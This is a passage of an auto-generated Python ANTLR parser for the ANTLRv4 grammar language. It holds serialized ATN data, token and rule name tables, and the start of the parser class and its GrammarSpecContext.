buf.write("\3\2\2\2x\u0274\3\2\2\2z\u0278\3\2\2\2|~\7\6\2\2}|\3\2")
buf.write("\2\2~\u0081\3\2\2\2\177}\3\2\2\2\177\u0080\3\2\2\2\u0080")
buf.write("\u0082\3\2\2\2\u0081\177\3\2\2\2\u0082\u0083\5\4\3\2\u0083")
buf.write("\u0084\5z>\2\u0084\u0088\7#\2\2\u0085\u0087\5\6\4\2\u0086")
buf.write("\u0085\3\2\2\2\u0087\u008a\3\2\2\2\u0088\u0086\3\2\2\2")
buf.write("\u0088\u0089\3\2\2\2\u0089\u008b\3\2\2\2\u008a\u0088\3")
buf.write("\2\2\2\u008b\u008f\5\"\22\2\u008c\u008e\5 \21\2\u008d")
buf.write("\u008c\3\2\2\2\u008e\u0091\3\2\2\2\u008f\u008d\3\2\2\2")
buf.write("\u008f\u0090\3\2\2\2\u0090\u0092\3\2\2\2\u0091\u008f\3")
buf.write("\2\2\2\u0092\u0093\7\2\2\3\u0093\3\3\2\2\2\u0094\u0095")
buf.write("\7\24\2\2\u0095\u009a\7\26\2\2\u0096\u0097\7\25\2\2\u0097")
buf.write("\u009a\7\26\2\2\u0098\u009a\7\26\2\2\u0099\u0094\3\2\2")
buf.write("\2\u0099\u0096\3\2\2\2\u0099\u0098\3\2\2\2\u009a\5\3\2")
buf.write("\2\2\u009b\u00a1\5\b\5\2\u009c\u00a1\5\16\b\2\u009d\u00a1")
buf.write("\5\22\n\2\u009e\u00a1\5\24\13\2\u009f\u00a1\5\30\r\2\u00a0")
buf.write("\u009b\3\2\2\2\u00a0\u009c\3\2\2\2\u00a0\u009d\3\2\2\2")
buf.write("\u00a0\u009e\3\2\2\2\u00a0\u009f\3\2\2\2\u00a1\7\3\2\2")
buf.write("\2\u00a2\u00a8\7\17\2\2\u00a3\u00a4\5\n\6\2\u00a4\u00a5")
buf.write("\7#\2\2\u00a5\u00a7\3\2\2\2\u00a6\u00a3\3\2\2\2\u00a7")
buf.write("\u00aa\3\2\2\2\u00a8\u00a6\3\2\2\2\u00a8\u00a9\3\2\2\2")
buf.write("\u00a9\u00ab\3\2\2\2\u00aa\u00a8\3\2\2\2\u00ab\u00ac\7")
buf.write("\'\2\2\u00ac\t\3\2\2\2\u00ad\u00ae\5z>\2\u00ae\u00af\7")
buf.write("+\2\2\u00af\u00b0\5\f\7\2\u00b0\13\3\2\2\2\u00b1\u00b6")
buf.write("\5z>\2\u00b2\u00b3\7\63\2\2\u00b3\u00b5\5z>\2\u00b4\u00b2")
buf.write("\3\2\2\2\u00b5\u00b8\3\2\2\2\u00b6\u00b4\3\2\2\2\u00b6")
buf.write("\u00b7\3\2\2\2\u00b7\u00bd\3\2\2\2\u00b8\u00b6\3\2\2\2")
buf.write("\u00b9\u00bd\7\13\2\2\u00ba\u00bd\5\34\17\2\u00bb\u00bd")
buf.write("\7\n\2\2\u00bc\u00b1\3\2\2\2\u00bc\u00b9\3\2\2\2\u00bc")
buf.write("\u00ba\3\2\2\2\u00bc\u00bb\3\2\2\2\u00bd\r\3\2\2\2\u00be")
buf.write("\u00bf\7\22\2\2\u00bf\u00c4\5\20\t\2\u00c0\u00c1\7\"\2")
buf.write("\2\u00c1\u00c3\5\20\t\2\u00c2\u00c0\3\2\2\2\u00c3\u00c6")
buf.write("\3\2\2\2\u00c4\u00c2\3\2\2\2\u00c4\u00c5\3\2\2\2\u00c5")
buf.write("\u00c7\3\2\2\2\u00c6\u00c4\3\2\2\2\u00c7\u00c8\7#\2\2")
buf.write("\u00c8\17\3\2\2\2\u00c9\u00ca\5z>\2\u00ca\21\3\2\2\2\u00cb")
buf.write("\u00cd\7\20\2\2\u00cc\u00ce\5\26\f\2\u00cd\u00cc\3\2\2")
buf.write("\2\u00cd\u00ce\3\2\2\2\u00ce\u00cf\3\2\2\2\u00cf\u00d0")
buf.write("\7\'\2\2\u00d0\23\3\2\2\2\u00d1\u00d3\7\21\2\2\u00d2\u00d4")
buf.write("\5\26\f\2\u00d3\u00d2\3\2\2\2\u00d3\u00d4\3\2\2\2\u00d4")
buf.write("\u00d5\3\2\2\2\u00d5\u00d6\7\'\2\2\u00d6\25\3\2\2\2\u00d7")
buf.write("\u00dc\5z>\2\u00d8\u00d9\7\"\2\2\u00d9\u00db\5z>\2\u00da")
buf.write("\u00d8\3\2\2\2\u00db\u00de\3\2\2\2\u00dc\u00da\3\2\2\2")
buf.write("\u00dc\u00dd\3\2\2\2\u00dd\u00e0\3\2\2\2\u00de\u00dc\3")
buf.write("\2\2\2\u00df\u00e1\7\"\2\2\u00e0\u00df\3\2\2\2\u00e0\u00e1")
buf.write("\3\2\2\2\u00e1\27\3\2\2\2\u00e2\u00e6\7\64\2\2\u00e3\u00e4")
buf.write("\5\32\16\2\u00e4\u00e5\7!\2\2\u00e5\u00e7\3\2\2\2\u00e6")
buf.write("\u00e3\3\2\2\2\u00e6\u00e7\3\2\2\2\u00e7\u00e8\3\2\2\2")
buf.write("\u00e8\u00e9\5z>\2\u00e9\u00ea\5\34\17\2\u00ea\31\3\2")
buf.write("\2\2\u00eb\u00ef\5z>\2\u00ec\u00ef\7\24\2\2\u00ed\u00ef")
buf.write("\7\25\2\2\u00ee\u00eb\3\2\2\2\u00ee\u00ec\3\2\2\2\u00ee")
buf.write("\u00ed\3\2\2\2\u00ef\33\3\2\2\2\u00f0\u00f4\7\16\2\2\u00f1")
buf.write("\u00f3\7?\2\2\u00f2\u00f1\3\2\2\2\u00f3\u00f6\3\2\2\2")
buf.write("\u00f4\u00f2\3\2\2\2\u00f4\u00f5\3\2\2\2\u00f5\u00f7\3")
buf.write("\2\2\2\u00f6\u00f4\3\2\2\2\u00f7\u00f8\7=\2\2\u00f8\35")
buf.write("\3\2\2\2\u00f9\u00fd\7\r\2\2\u00fa\u00fc\7<\2\2\u00fb")
buf.write("\u00fa\3\2\2\2\u00fc\u00ff\3\2\2\2\u00fd\u00fb\3\2\2\2")
buf.write("\u00fd\u00fe\3\2\2\2\u00fe\u0100\3\2\2\2\u00ff\u00fd\3")
buf.write("\2\2\2\u0100\u0101\7:\2\2\u0101\37\3\2\2\2\u0102\u0103")
buf.write("\7\37\2\2\u0103\u0104\5z>\2\u0104\u0108\7#\2\2\u0105\u0107")
buf.write("\5B\"\2\u0106\u0105\3\2\2\2\u0107\u010a\3\2\2\2\u0108")
buf.write("\u0106\3\2\2\2\u0108\u0109\3\2\2\2\u0109!\3\2\2\2\u010a")
buf.write("\u0108\3\2\2\2\u010b\u010d\5$\23\2\u010c\u010b\3\2\2\2")
buf.write("\u010d\u0110\3\2\2\2\u010e\u010c\3\2\2\2\u010e\u010f\3")
buf.write("\2\2\2\u010f#\3\2\2\2\u0110\u010e\3\2\2\2\u0111\u0113")
buf.write("\7\7\2\2\u0112\u0111\3\2\2\2\u0113\u0116\3\2\2\2\u0114")
buf.write("\u0112\3\2\2\2\u0114\u0115\3\2\2\2\u0115\u0119\3\2\2\2")
buf.write("\u0116\u0114\3\2\2\2\u0117\u011a\5&\24\2\u0118\u011a\5")
buf.write("B\"\2\u0119\u0117\3\2\2\2\u0119\u0118\3\2\2\2\u011a%\3")
buf.write("\2\2\2\u011b\u011d\7\6\2\2\u011c\u011b\3\2\2\2\u011d\u0120")
buf.write("\3\2\2\2\u011e\u011c\3\2\2\2\u011e\u011f\3\2\2\2\u011f")
buf.write("\u0122\3\2\2\2\u0120\u011e\3\2\2\2\u0121\u0123\58\35\2")
buf.write("\u0122\u0121\3\2\2\2\u0122\u0123\3\2\2\2\u0123\u0124\3")
buf.write("\2\2\2\u0124\u0126\7\4\2\2\u0125\u0127\5\36\20\2\u0126")
buf.write("\u0125\3\2\2\2\u0126\u0127\3\2\2\2\u0127\u0129\3\2\2\2")
buf.write("\u0128\u012a\5\60\31\2\u0129\u0128\3\2\2\2\u0129\u012a")
buf.write("\3\2\2\2\u012a\u012c\3\2\2\2\u012b\u012d\5\62\32\2\u012c")
buf.write("\u012b\3\2\2\2\u012c\u012d\3\2\2\2\u012d\u012f\3\2\2\2")
buf.write("\u012e\u0130\5\64\33\2\u012f\u012e\3\2\2\2\u012f\u0130")
buf.write("\3\2\2\2\u0130\u0134\3\2\2\2\u0131\u0133\5.\30\2\u0132")
buf.write("\u0131\3\2\2\2\u0133\u0136\3\2\2\2\u0134\u0132\3\2\2\2")
buf.write("\u0134\u0135\3\2\2\2\u0135\u0137\3\2\2\2\u0136\u0134\3")
buf.write("\2\2\2\u0137\u0138\7 \2\2\u0138\u0139\5<\37\2\u0139\u013a")
buf.write("\7#\2\2\u013a\u013b\5(\25\2\u013b\'\3\2\2\2\u013c\u013e")
buf.write("\5*\26\2\u013d\u013c\3\2\2\2\u013e\u0141\3\2\2\2\u013f")
buf.write("\u013d\3\2\2\2\u013f\u0140\3\2\2\2\u0140\u0143\3\2\2\2")
buf.write("\u0141\u013f\3\2\2\2\u0142\u0144\5,\27\2\u0143\u0142\3")
buf.write("\2\2\2\u0143\u0144\3\2\2\2\u0144)\3\2\2\2\u0145\u0146")
buf.write("\7\35\2\2\u0146\u0147\5\36\20\2\u0147\u0148\5\34\17\2")
buf.write("\u0148+\3\2\2\2\u0149\u014a\7\36\2\2\u014a\u014b\5\34")
buf.write("\17\2\u014b-\3\2\2\2\u014c\u014f\5\b\5\2\u014d\u014f\5")
buf.write("\66\34\2\u014e\u014c\3\2\2\2\u014e\u014d\3\2\2\2\u014f")
buf.write("/\3\2\2\2\u0150\u0151\7\32\2\2\u0151\u0152\5\36\20\2\u0152")
buf.write("\61\3\2\2\2\u0153\u0154\7\34\2\2\u0154\u0159\5z>\2\u0155")
buf.write("\u0156\7\"\2\2\u0156\u0158\5z>\2\u0157\u0155\3\2\2\2\u0158")
buf.write("\u015b\3\2\2\2\u0159\u0157\3\2\2\2\u0159\u015a\3\2\2\2")
buf.write("\u015a\63\3\2\2\2\u015b\u0159\3\2\2\2\u015c\u015d\7\33")
buf.write("\2\2\u015d\u015e\5\36\20\2\u015e\65\3\2\2\2\u015f\u0160")
buf.write("\7\64\2\2\u0160\u0161\5z>\2\u0161\u0162\5\34\17\2\u0162")
buf.write("\67\3\2\2\2\u0163\u0165\5:\36\2\u0164\u0163\3\2\2\2\u0165")
buf.write("\u0166\3\2\2\2\u0166\u0164\3\2\2\2\u0166\u0167\3\2\2\2")
buf.write("\u01679\3\2\2\2\u0168\u0169\t\2\2\2\u0169;\3\2\2\2\u016a")
buf.write("\u016b\5> \2\u016b=\3\2\2\2\u016c\u0171\5@!\2\u016d\u016e")
buf.write("\7\60\2\2\u016e\u0170\5@!\2\u016f\u016d\3\2\2\2\u0170")
buf.write("\u0173\3\2\2\2\u0171\u016f\3\2\2\2\u0171\u0172\3\2\2\2")
buf.write("\u0172?\3\2\2\2\u0173\u0171\3\2\2\2\u0174\u0177\5\\/\2")
buf.write("\u0175\u0176\7\65\2\2\u0176\u0178\5z>\2\u0177\u0175\3")
buf.write("\2\2\2\u0177\u0178\3\2\2\2\u0178A\3\2\2\2\u0179\u017b")
buf.write("\7\6\2\2\u017a\u0179\3\2\2\2\u017b\u017e\3\2\2\2\u017c")
buf.write("\u017a\3\2\2\2\u017c\u017d\3\2\2\2\u017d\u0180\3\2\2\2")
buf.write("\u017e\u017c\3\2\2\2\u017f\u0181\7\23\2\2\u0180\u017f")
buf.write("\3\2\2\2\u0180\u0181\3\2\2\2\u0181\u0182\3\2\2\2\u0182")
buf.write("\u0183\7\3\2\2\u0183\u0184\7 \2\2\u0184\u0185\5D#\2\u0185")
buf.write("\u0186\7#\2\2\u0186C\3\2\2\2\u0187\u0188\5F$\2\u0188E")
buf.write("\3\2\2\2\u0189\u018e\5H%\2\u018a\u018b\7\60\2\2\u018b")
buf.write("\u018d\5H%\2\u018c\u018a\3\2\2\2\u018d\u0190\3\2\2\2\u018e")
buf.write("\u018c\3\2\2\2\u018e\u018f\3\2\2\2\u018fG\3\2\2\2\u0190")
buf.write("\u018e\3\2\2\2\u0191\u0193\5J&\2\u0192\u0194\5R*\2\u0193")
buf.write("\u0192\3\2\2\2\u0193\u0194\3\2\2\2\u0194\u0197\3\2\2\2")
buf.write("\u0195\u0197\3\2\2\2\u0196\u0191\3\2\2\2\u0196\u0195\3")
buf.write("\2\2\2\u0197I\3\2\2\2\u0198\u019a\5L\'\2\u0199\u0198\3")
buf.write("\2\2\2\u019a\u019b\3\2\2\2\u019b\u0199\3\2\2\2\u019b\u019c")
buf.write("\3\2\2\2\u019cK\3\2\2\2\u019d\u019f\5N(\2\u019e\u01a0")
buf.write("\5b\62\2\u019f\u019e\3\2\2\2\u019f\u01a0\3\2\2\2\u01a0")
buf.write("\u01ae\3\2\2\2\u01a1\u01a3\5d\63\2\u01a2\u01a4\5b\62\2")
buf.write("\u01a3\u01a2\3\2\2\2\u01a3\u01a4\3\2\2\2\u01a4\u01ae\3")
buf.write("\2\2\2\u01a5\u01a7\5P)\2\u01a6\u01a8\5b\62\2\u01a7\u01a6")
buf.write("\3\2\2\2\u01a7\u01a8\3\2\2\2\u01a8\u01ae\3\2\2\2\u01a9")
buf.write("\u01ab\5\34\17\2\u01aa\u01ac\7,\2\2\u01ab\u01aa\3\2\2")
buf.write("\2\u01ab\u01ac\3\2\2\2\u01ac\u01ae\3\2\2\2\u01ad\u019d")
buf.write("\3\2\2\2\u01ad\u01a1\3\2\2\2\u01ad\u01a5\3\2\2\2\u01ad")
buf.write("\u01a9\3\2\2\2\u01aeM\3\2\2\2\u01af\u01b0\5z>\2\u01b0")
buf.write("\u01b3\t\3\2\2\u01b1\u01b4\5d\63\2\u01b2\u01b4\5P)\2\u01b3")
buf.write("\u01b1\3\2\2\2\u01b3\u01b2\3\2\2\2\u01b4O\3\2\2\2\u01b5")
buf.write("\u01b6\7$\2\2\u01b6\u01b7\5F$\2\u01b7\u01b8\7%\2\2\u01b8")
buf.write("Q\3\2\2\2\u01b9\u01ba\7(\2\2\u01ba\u01bf\5T+\2\u01bb\u01bc")
buf.write("\7\"\2\2\u01bc\u01be\5T+\2\u01bd\u01bb\3\2\2\2\u01be\u01c1")
buf.write("\3\2\2\2\u01bf\u01bd\3\2\2\2\u01bf\u01c0\3\2\2\2\u01c0")
buf.write("S\3\2\2\2\u01c1\u01bf\3\2\2\2\u01c2\u01c3\5V,\2\u01c3")
buf.write("\u01c4\7$\2\2\u01c4\u01c5\5X-\2\u01c5\u01c6\7%\2\2\u01c6")
buf.write("\u01c9\3\2\2\2\u01c7\u01c9\5V,\2\u01c8\u01c2\3\2\2\2\u01c8")
buf.write("\u01c7\3\2\2\2\u01c9U\3\2\2\2\u01ca\u01cd\5z>\2\u01cb")
buf.write("\u01cd\7\37\2\2\u01cc\u01ca\3\2\2\2\u01cc\u01cb\3\2\2")
buf.write("\2\u01cdW\3\2\2\2\u01ce\u01d1\5z>\2\u01cf\u01d1\7\n\2")
buf.write("\2\u01d0\u01ce\3\2\2\2\u01d0\u01cf\3\2\2\2\u01d1Y\3\2")
buf.write("\2\2\u01d2\u01d7\5\\/\2\u01d3\u01d4\7\60\2\2\u01d4\u01d6")
buf.write("\5\\/\2\u01d5\u01d3\3\2\2\2\u01d6\u01d9\3\2\2\2\u01d7")
buf.write("\u01d5\3\2\2\2\u01d7\u01d8\3\2\2\2\u01d8[\3\2\2\2\u01d9")
buf.write("\u01d7\3\2\2\2\u01da\u01dc\5v<\2\u01db\u01da\3\2\2\2\u01db")
buf.write("\u01dc\3\2\2\2\u01dc\u01de\3\2\2\2\u01dd\u01df\5^\60\2")
buf.write("\u01de\u01dd\3\2\2\2\u01df\u01e0\3\2\2\2\u01e0\u01de\3")
buf.write("\2\2\2\u01e0\u01e1\3\2\2\2\u01e1\u01e4\3\2\2\2\u01e2\u01e4")
buf.write("\3\2\2\2\u01e3\u01db\3\2\2\2\u01e3\u01e2\3\2\2\2\u01e4")
buf.write("]\3\2\2\2\u01e5\u01e7\5`\61\2\u01e6\u01e8\5b\62\2\u01e7")
buf.write("\u01e6\3\2\2\2\u01e7\u01e8\3\2\2\2\u01e8\u01f7\3\2\2\2")
buf.write("\u01e9\u01eb\5f\64\2\u01ea\u01ec\5b\62\2\u01eb\u01ea\3")
buf.write("\2\2\2\u01eb\u01ec\3\2\2\2\u01ec\u01f7\3\2\2\2\u01ed\u01ef")
buf.write("\5n8\2\u01ee\u01f0\5b\62\2\u01ef\u01ee\3\2\2\2\u01ef\u01f0")
buf.write("\3\2\2\2\u01f0\u01f7\3\2\2\2\u01f1\u01f3\5\34\17\2\u01f2")
buf.write("\u01f4\7,\2\2\u01f3\u01f2\3\2\2\2\u01f3\u01f4\3\2\2\2")
buf.write("\u01f4\u01f7\3\2\2\2\u01f5\u01f7\7\6\2\2\u01f6\u01e5\3")
buf.write("\2\2\2\u01f6\u01e9\3\2\2\2\u01f6\u01ed\3\2\2\2\u01f6\u01f1")
buf.write("\3\2\2\2\u01f6\u01f5\3\2\2\2\u01f7_\3\2\2\2\u01f8\u01f9")
buf.write("\5z>\2\u01f9\u01fc\t\3\2\2\u01fa\u01fd\5f\64\2\u01fb\u01fd")
buf.write("\5n8\2\u01fc\u01fa\3\2\2\2\u01fc\u01fb\3\2\2\2\u01fda")
buf.write("\3\2\2\2\u01fe\u0200\7,\2\2\u01ff\u0201\7,\2\2\u0200\u01ff")
buf.write("\3\2\2\2\u0200\u0201\3\2\2\2\u0201\u020b\3\2\2\2\u0202")
buf.write("\u0204\7-\2\2\u0203\u0205\7,\2\2\u0204\u0203\3\2\2\2\u0204")
buf.write("\u0205\3\2\2\2\u0205\u020b\3\2\2\2\u0206\u0208\7/\2\2")
buf.write("\u0207\u0209\7,\2\2\u0208\u0207\3\2\2\2\u0208\u0209\3")
buf.write("\2\2\2\u0209\u020b\3\2\2\2\u020a\u01fe\3\2\2\2\u020a\u0202")
buf.write("\3\2\2\2\u020a\u0206\3\2\2\2\u020bc\3\2\2\2\u020c\u0216")
buf.write("\5r:\2\u020d\u0216\5t;\2\u020e\u0216\5h\65\2\u020f\u0216")
buf.write("\7\5\2\2\u0210\u0212\7\63\2\2\u0211\u0213\5v<\2\u0212")
buf.write("\u0211\3\2\2\2\u0212\u0213\3\2\2\2\u0213\u0216\3\2\2\2")
buf.write("\u0214\u0216\7\6\2\2\u0215\u020c\3\2\2\2\u0215\u020d\3")
buf.write("\2\2\2\u0215\u020e\3\2\2\2\u0215\u020f\3\2\2\2\u0215\u0210")
buf.write("\3\2\2\2\u0215\u0214\3\2\2\2\u0216e\3\2\2\2\u0217\u021f")
buf.write("\5t;\2\u0218\u021f\5p9\2\u0219\u021f\5h\65\2\u021a\u021c")
buf.write("\7\63\2\2\u021b\u021d\5v<\2\u021c\u021b\3\2\2\2\u021c")
buf.write("\u021d\3\2\2\2\u021d\u021f\3\2\2\2\u021e\u0217\3\2\2\2")
buf.write("\u021e\u0218\3\2\2\2\u021e\u0219\3\2\2\2\u021e\u021a\3")
buf.write("\2\2\2\u021fg\3\2\2\2\u0220\u0221\7\66\2\2\u0221\u0225")
buf.write("\5l\67\2\u0222\u0223\7\66\2\2\u0223\u0225\5j\66\2\u0224")
buf.write("\u0220\3\2\2\2\u0224\u0222\3\2\2\2\u0225i\3\2\2\2\u0226")
buf.write("\u0227\7$\2\2\u0227\u022c\5l\67\2\u0228\u0229\7\60\2\2")
buf.write("\u0229\u022b\5l\67\2\u022a\u0228\3\2\2\2\u022b\u022e\3")
buf.write("\2\2\2\u022c\u022a\3\2\2\2\u022c\u022d\3\2\2\2\u022d\u022f")
buf.write("\3\2\2\2\u022e\u022c\3\2\2\2\u022f\u0230\7%\2\2\u0230")
buf.write("k\3\2\2\2\u0231\u0233\7\3\2\2\u0232\u0234\5v<\2\u0233")
buf.write("\u0232\3\2\2\2\u0233\u0234\3\2\2\2\u0234\u023c\3\2\2\2")
buf.write("\u0235\u0237\7\13\2\2\u0236\u0238\5v<\2\u0237\u0236\3")
buf.write("\2\2\2\u0237\u0238\3\2\2\2\u0238\u023c\3\2\2\2\u0239\u023c")
buf.write("\5r:\2\u023a\u023c\7\5\2\2\u023b\u0231\3\2\2\2\u023b\u0235")
buf.write("\3\2\2\2\u023b\u0239\3\2\2\2\u023b\u023a\3\2\2\2\u023c")
buf.write("m\3\2\2\2\u023d\u0248\7$\2\2\u023e\u0240\5\b\5\2\u023f")
buf.write("\u023e\3\2\2\2\u023f\u0240\3\2\2\2\u0240\u0244\3\2\2\2")
buf.write("\u0241\u0243\5\66\34\2\u0242\u0241\3\2\2\2\u0243\u0246")
buf.write("\3\2\2\2\u0244\u0242\3\2\2\2\u0244\u0245\3\2\2\2\u0245")
buf.write("\u0247\3\2\2\2\u0246\u0244\3\2\2\2\u0247\u0249\7 \2\2")
buf.write("\u0248\u023f\3\2\2\2\u0248\u0249\3\2\2\2\u0249\u024a\3")
buf.write("\2\2\2\u024a\u024b\5Z.\2\u024b\u024c\7%\2\2\u024co\3\2")
buf.write("\2\2\u024d\u024f\7\4\2\2\u024e\u0250\5\36\20\2\u024f\u024e")
buf.write("\3\2\2\2\u024f\u0250\3\2\2\2\u0250\u0252\3\2\2\2\u0251")
buf.write("\u0253\5v<\2\u0252\u0251\3\2\2\2\u0252\u0253\3\2\2\2\u0253")
buf.write("q\3\2\2\2\u0254\u0255\7\13\2\2\u0255\u0256\7\62\2\2\u0256")
buf.write("\u0257\7\13\2\2\u0257s\3\2\2\2\u0258\u025a\7\3\2\2\u0259")
buf.write("\u025b\5v<\2\u025a\u0259\3\2\2\2\u025a\u025b\3\2\2\2\u025b")
buf.write("\u0261\3\2\2\2\u025c\u025e\7\13\2\2\u025d\u025f\5v<\2")
buf.write("\u025e\u025d\3\2\2\2\u025e\u025f\3\2\2\2\u025f\u0261\3")
buf.write("\2\2\2\u0260\u0258\3\2\2\2\u0260\u025c\3\2\2\2\u0261u")
buf.write("\3\2\2\2\u0262\u0263\7)\2\2\u0263\u0268\5x=\2\u0264\u0265")
buf.write("\7\"\2\2\u0265\u0267\5x=\2\u0266\u0264\3\2\2\2\u0267\u026a")
buf.write("\3\2\2\2\u0268\u0266\3\2\2\2\u0268\u0269\3\2\2\2\u0269")
buf.write("\u026b\3\2\2\2\u026a\u0268\3\2\2\2\u026b\u026c\7*\2\2")
buf.write("\u026cw\3\2\2\2\u026d\u0275\5z>\2\u026e\u026f\5z>\2\u026f")
buf.write("\u0272\7+\2\2\u0270\u0273\5z>\2\u0271\u0273\7\13\2\2\u0272")
buf.write("\u0270\3\2\2\2\u0272\u0271\3\2\2\2\u0273\u0275\3\2\2\2")
buf.write("\u0274\u026d\3\2\2\2\u0274\u026e\3\2\2\2\u0275y\3\2\2")
buf.write("\2\u0276\u0279\7\4\2\2\u0277\u0279\7\3\2\2\u0278\u0276")
buf.write("\3\2\2\2\u0278\u0277\3\2\2\2\u0279{\3\2\2\2X\177\u0088")
buf.write("\u008f\u0099\u00a0\u00a8\u00b6\u00bc\u00c4\u00cd\u00d3")
buf.write("\u00dc\u00e0\u00e6\u00ee\u00f4\u00fd\u0108\u010e\u0114")
buf.write("\u0119\u011e\u0122\u0126\u0129\u012c\u012f\u0134\u013f")
buf.write("\u0143\u014e\u0159\u0166\u0171\u0177\u017c\u0180\u018e")
buf.write("\u0193\u0196\u019b\u019f\u01a3\u01a7\u01ab\u01ad\u01b3")
buf.write("\u01bf\u01c8\u01cc\u01d0\u01d7\u01db\u01e0\u01e3\u01e7")
buf.write("\u01eb\u01ef\u01f3\u01f6\u01fc\u0200\u0204\u0208\u020a")
buf.write("\u0212\u0215\u021c\u021e\u0224\u022c\u0233\u0237\u023b")
buf.write("\u023f\u0244\u0248\u024f\u0252\u025a\u025e\u0260\u0268")
buf.write("\u0272\u0274\u0278")
return buf.getvalue()
class ANTLRv4Parser ( Parser ):
grammarFileName = "ANTLRv4Parser.g4"
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
sharedContextCache = PredictionContextCache()
literalNames = [ "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"'import'", "'fragment'", "'lexer'", "'parser'", "'grammar'",
"'protected'", "'public'", "'private'", "'returns'",
"'locals'", "'throws'", "'catch'", "'finally'", "'mode'" ]
symbolicNames = [ "<INVALID>", "TOKEN_REF", "RULE_REF", "LEXER_CHAR_SET",
"DOC_COMMENT", "HEADER", "BLOCK_COMMENT", "LINE_COMMENT",
"INT", "STRING_LITERAL", "UNTERMINATED_STRING_LITERAL",
"BEGIN_ARGUMENT", "BEGIN_ACTION", "OPTIONS", "TOKENS",
"CHANNELS", "IMPORT", "FRAGMENT", "LEXER", "PARSER",
"GRAMMAR", "PROTECTED", "PUBLIC", "PRIVATE", "RETURNS",
"LOCALS", "THROWS", "CATCH", "FINALLY", "MODE", "COLON",
"COLONCOLON", "COMMA", "SEMI", "LPAREN", "RPAREN",
"LBRACE", "RBRACE", "RARROW", "LT", "GT", "ASSIGN",
"QUESTION", "STAR", "PLUS_ASSIGN", "PLUS", "OR", "DOLLAR",
"RANGE", "DOT", "AT", "POUND", "NOT", "ID", "WS",
"ERRCHAR", "END_ARGUMENT", "UNTERMINATED_ARGUMENT",
"ARGUMENT_CONTENT", "END_ACTION", "UNTERMINATED_ACTION",
"ACTION_CONTENT", "UNTERMINATED_CHAR_SET" ]
RULE_grammarSpec = 0
RULE_grammarType = 1
RULE_prequelConstruct = 2
RULE_optionsSpec = 3
RULE_option = 4
RULE_optionValue = 5
RULE_delegateGrammars = 6
RULE_delegateGrammar = 7
RULE_tokensSpec = 8
RULE_channelsSpec = 9
RULE_idList = 10
RULE_action = 11
RULE_actionScopeName = 12
RULE_actionBlock = 13
RULE_argActionBlock = 14
RULE_modeSpec = 15
RULE_rules = 16
RULE_ruleSpec = 17
RULE_parserRuleSpec = 18
RULE_exceptionGroup = 19
RULE_exceptionHandler = 20
RULE_finallyClause = 21
RULE_rulePrequel = 22
RULE_ruleReturns = 23
RULE_throwsSpec = 24
RULE_localsSpec = 25
RULE_ruleAction = 26
RULE_ruleModifiers = 27
RULE_ruleModifier = 28
RULE_ruleBlock = 29
RULE_ruleAltList = 30
RULE_labeledAlt = 31
RULE_lexerRuleSpec = 32
RULE_lexerRuleBlock = 33
RULE_lexerAltList = 34
RULE_lexerAlt = 35
RULE_lexerElements = 36
RULE_lexerElement = 37
RULE_labeledLexerElement = 38
RULE_lexerBlock = 39
RULE_lexerCommands = 40
RULE_lexerCommand = 41
RULE_lexerCommandName = 42
RULE_lexerCommandExpr = 43
RULE_altList = 44
RULE_alternative = 45
RULE_element = 46
RULE_labeledElement = 47
RULE_ebnfSuffix = 48
RULE_lexerAtom = 49
RULE_atom = 50
RULE_notSet = 51
RULE_blockSet = 52
RULE_setElement = 53
RULE_block = 54
RULE_ruleref = 55
RULE_characterRange = 56
RULE_terminal = 57
RULE_elementOptions = 58
RULE_elementOption = 59
RULE_identifier = 60
ruleNames = [ "grammarSpec", "grammarType", "prequelConstruct", "optionsSpec",
"option", "optionValue", "delegateGrammars", "delegateGrammar",
"tokensSpec", "channelsSpec", "idList", "action", "actionScopeName",
"actionBlock", "argActionBlock", "modeSpec", "rules",
"ruleSpec", "parserRuleSpec", "exceptionGroup", "exceptionHandler",
"finallyClause", "rulePrequel", "ruleReturns", "throwsSpec",
"localsSpec", "ruleAction", "ruleModifiers", "ruleModifier",
"ruleBlock", "ruleAltList", "labeledAlt", "lexerRuleSpec",
"lexerRuleBlock", "lexerAltList", "lexerAlt", "lexerElements",
"lexerElement", "labeledLexerElement", "lexerBlock",
"lexerCommands", "lexerCommand", "lexerCommandName",
"lexerCommandExpr", "altList", "alternative", "element",
"labeledElement", "ebnfSuffix", "lexerAtom", "atom",
"notSet", "blockSet", "setElement", "block", "ruleref",
"characterRange", "terminal", "elementOptions", "elementOption",
"identifier" ]
EOF = Token.EOF
TOKEN_REF=1
RULE_REF=2
LEXER_CHAR_SET=3
DOC_COMMENT=4
HEADER=5
BLOCK_COMMENT=6
LINE_COMMENT=7
INT=8
STRING_LITERAL=9
UNTERMINATED_STRING_LITERAL=10
BEGIN_ARGUMENT=11
BEGIN_ACTION=12
OPTIONS=13
TOKENS=14
CHANNELS=15
IMPORT=16
FRAGMENT=17
LEXER=18
PARSER=19
GRAMMAR=20
PROTECTED=21
PUBLIC=22
PRIVATE=23
RETURNS=24
LOCALS=25
THROWS=26
CATCH=27
FINALLY=28
MODE=29
COLON=30
COLONCOLON=31
COMMA=32
SEMI=33
LPAREN=34
RPAREN=35
LBRACE=36
RBRACE=37
RARROW=38
LT=39
GT=40
ASSIGN=41
QUESTION=42
STAR=43
PLUS_ASSIGN=44
PLUS=45
OR=46
DOLLAR=47
RANGE=48
DOT=49
AT=50
POUND=51
NOT=52
ID=53
WS=54
ERRCHAR=55
END_ARGUMENT=56
UNTERMINATED_ARGUMENT=57
ARGUMENT_CONTENT=58
END_ACTION=59
UNTERMINATED_ACTION=60
ACTION_CONTENT=61
UNTERMINATED_CHAR_SET=62
def __init__(self, input:TokenStream, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.7")
self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)
self._predicates = None
class GrammarSpecContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self._DOC_COMMENT = None # Token
self.docs = list() # of Tokens
self.gtype = None # GrammarTypeContext
self.gname = None # IdentifierContext
def SEMI(self):
return self.getToken(ANTLRv4Parser.SEMI, 0)
def rules(self):
